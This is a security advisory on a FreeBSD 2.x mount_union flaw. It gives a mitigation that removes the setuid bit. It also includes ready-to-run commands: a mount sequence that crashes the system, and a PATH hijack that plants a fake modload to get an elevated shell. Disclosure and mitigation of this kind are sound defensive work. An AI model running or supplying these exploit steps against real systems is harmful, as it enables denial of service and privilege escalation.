COMMAND
mount_union
SYSTEMS AFFECTED
FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current
PROBLEM
A bug was found in the union file system code which can allow
an unprivileged local user to compromise system stability.
This problem is present in all source code and binary
distributions of FreeBSD version 2.x released before 1996-05-18.
The union filesystem code had problems with certain mount ordering
problems. By executing a certain sequence of mount_union commands,
an unprivileged local user may cause a system reload.
The problem could allow local users to compromise system
stability.
This vulnerability can only be exploited by users with a valid
account on the local system.
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b
to got euid try this:
export PATH=/tmp:$PATH
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
SOLUTION
The FreeBSD project is currently developing a solution to this
problem, however the proper solution will not be available until
a future FreeBSD release. We do not anticipate releasing patches
for previous versions of FreeBSD due to the extensive nature of
this fix. This security advisory will be updated as new
information is made available.
This vulnerability can quickly and easily be limited by removing
the setuid permission bit from the mount_union program. This
workaround will work for all versions of FreeBSD affected by
this problem.
As root, execute the command:
% chmod u-s /sbin/mount_union
then verify that the setuid permissions of the files have been
removed. The permissions array should read "-r-xr-xr-x" as
shown here:
% ls -l /sbin/mount_union
-r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union
In addition to changing the permissions on the executable files,
if you have the source code installed, we suggest patching the
sources so that mount_union will not be installed with the
setuid bit set.